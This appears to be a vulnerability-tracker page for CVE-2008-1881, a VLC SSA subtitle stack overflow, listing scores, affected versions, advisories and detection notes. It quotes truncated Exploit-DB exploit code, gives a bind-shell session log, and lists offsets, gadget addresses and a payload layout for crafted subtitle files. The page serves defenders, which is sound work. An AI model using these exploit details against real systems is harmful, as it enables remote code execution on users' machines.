CVE-2008-1881
published 2008-04-17CVE-2008-1881: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long…
PriorityP341medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
11.78%
95.6th percentile
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6.e-2.1 (bookworm) | vlc 0.8.6.e-2.1 (bookworm) |
| videolan | vlc | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
| videolan | vlc_media_player | >= 0 < 0.8.6.e-2.1 | 0.8.6.e-2.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandDialogue: <OFFSET1><NOP1><SHELLCODE1><OFFSET2><JMPESP><SHELLCODE1><OFFSET3><JMPBACK><JMPS><SEH>↗
bytes↗
\x59\x65\xFE\x62
bytes↗
\x66\x14\x40
bytes↗
\xE9\x2E\xCD\xFF\xFF
- →Malicious SSA subtitle files exploit a stack-based buffer overflow in VLC's ParseSSA function; detect anomalously large 'Dialogue:' lines in .ssa files (offsets of 152242+ 'A' bytes observed in PoC). ↗
- →Exploit payload embeds a bind-shell shellcode (LPORT=4444) encoded with PexAlphaNum/alpha_mixed; look for alphanumeric-only shellcode patterns in SSA subtitle content. ↗
- →Exploit uses a JMP ESP gadget at 0x62FE6559 inside libvlc.dll and a POP/POP/RET SEH gadget at 0x401466 inside vlc.exe; these addresses can be used as memory-based detection signatures for the specific VLC 0.8.6d/e builds. ↗
- →Crafted .avi files paired with malicious .ssa subtitle files are used as the delivery mechanism; both files are created together by the exploit builder. ↗
- →SSA exploit files contain the string 'VLC 0.8.6d buffer-overflow' or 'VLC version 8.06' in the Script Info Title field; this can be used as a file-content signature. ↗
- →NOP sled of 16 bytes (\x90*16) precedes shellcode in the SSA Dialogue field; combined with the large 'A' offset, this pattern is detectable via file scanning. ↗
- ·CVE-2008-1881 is explicitly noted as an incomplete fix for CVE-2007-6681; the exploit code references CVE-2007-6681 and targets VLC 0.8.6d, while the CVE itself covers VLC 0.8.6e — detection rules should cover both versions. ↗
- ·The ROP/JMP gadget addresses (0x62FE6559 in libvlc.dll, 0x401466 in vlc.exe) are version-specific to VLC 0.8.6d builds; they will not match other builds and should not be used as the sole detection mechanism. ↗
- ·The overflow offset differs between VLC versions: 165254 bytes for 0.8.6c and 165286 bytes for 0.8.6e; detection thresholds for subtitle line length should account for both values. ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7fxm-mjcc-cj9m: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-1881 [HIGH] CWE-119 GHSA-7fxm-mjcc-cj9m: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
OSV
CVE-2008-1881: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
osv·2008-04-17·CVSS 7.5
CVE-2008-1881 [HIGH] CVE-2008-1881: Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
Debian
CVE-2008-1881: vlc - Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) ...
vendor_debian·2008·CVSS 7.5
CVE-2008-1881 [HIGH] CVE-2008-1881: vlc - Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) ...
Stack-based buffer overflow in the ParseSSA function (modules/demux/subtitle.c) in VLC 0.8.6e allows remote attackers to execute arbitrary code via a long subtitle in an SSA file. NOTE: this issue is due to an incomplete fix for CVE-2007-6681.
Scope: local
bookworm: resolved (fixed in 0.8.6.e-2.1)
bullseye: resolved (fixed in 0.8.6.e-2.1)
forky: resolved (fixed in 0.8.6.e-2.1)
sid: resolved (fixed in 0.8.6.e-2.1)
trixie: resolved (fixed in 0.8.6.e-2.1)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow
exploitdb·2008-03-14
CVE-2008-1881 VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow
VideoLAN VLC Media Player 0.8.6e - Subtitle Parsing Local Buffer Overflow
---
/*
VLC
#include
#include
char ssa_header[]=
"[Script Info]\r\n"
"Title: VLC version 8.06.c\r\n");
printf("2> version 8.06.d\r\n");
printf("3> version 8.06.e\r\nChose:");
j=getchar();
switch(j)
{
case '1': k=165254;break;
case '2': printf("\r\nI haven't got this version!\r\n Good Luck :-)");
getchar();
return 0;break;
case '3': k=165286;break;
}
k=k-sizeof(shellcode);
printf("\r\n[+] Creating .ssa file ...");
FILE* f;
char szBuffer[170000];
char szBuffer2[200];
strcpy(szBuffer,ssa_header); // header of ssa
memset((szBuffer+sizeof(ssa_header)-1),'\x90',k);
szBuffer[k+sizeof(ssa_header)]='\x00';
strcpy(szBuffer2,shellcode);
strcat(szBuffer2,szJMP);
strcat(szBuffer,szBuffer2);
f=fopen("Bof-VLC.ssa","wb");
if(f=
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/vlcboffs-adv.txthttp://aluigi.org/adv/vlcboffs-adv.txthttp://secunia.com/advisories/28233http://secunia.com/advisories/29800http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://wiki.videolan.org/Changelog/0.8.6fhttp://www.securityfocus.com/archive/1/489698http://www.securityfocus.com/bid/28251http://www.securityfocus.com/bid/28274https://exchange.xforce.ibmcloud.com/vulnerabilities/41237https://exchange.xforce.ibmcloud.com/vulnerabilities/41936https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14872https://www.exploit-db.com/exploits/5250http://aluigi.altervista.org/adv/vlcboffs-adv.txthttp://aluigi.org/adv/vlcboffs-adv.txthttp://secunia.com/advisories/28233http://secunia.com/advisories/29800http://security.gentoo.org/glsa/glsa-200804-25.xmlhttp://wiki.videolan.org/Changelog/0.8.6fhttp://www.securityfocus.com/archive/1/489698http://www.securityfocus.com/bid/28251http://www.securityfocus.com/bid/28274https://exchange.xforce.ibmcloud.com/vulnerabilities/41237https://exchange.xforce.ibmcloud.com/vulnerabilities/41936https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14872https://www.exploit-db.com/exploits/5250
2008-04-17
Published